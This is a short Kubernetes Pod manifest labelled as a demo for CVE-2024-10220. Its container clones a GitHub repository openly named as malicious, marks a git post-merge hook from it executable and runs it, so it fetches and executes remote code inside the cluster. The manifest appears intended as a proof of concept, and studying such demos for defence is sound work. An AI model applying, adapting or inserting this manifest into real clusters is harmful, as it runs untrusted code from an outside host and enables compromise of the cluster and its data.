apiVersion: v1
kind: Pod
metadata:
  name: cve-2024-10220-demo
spec:
  containers:
  - name: demo-container
    image: alpine/git
    command: ["/bin/sh", "-c"]
    args:
      - git clone https://github.com/jvsz5/repositorioMAlicioso.git /mnt/git;
        chmod +x /mnt/git/fake-git/hooks/post-merge;
        /mnt/git/fake-git/hooks/post-merge;
        ls /tmp;
        sleep 3600
    volumeMounts:
    - name: git-volume
      mountPath: /mnt/git
  volumes:
  - name: git-volume
    emptyDir: {}
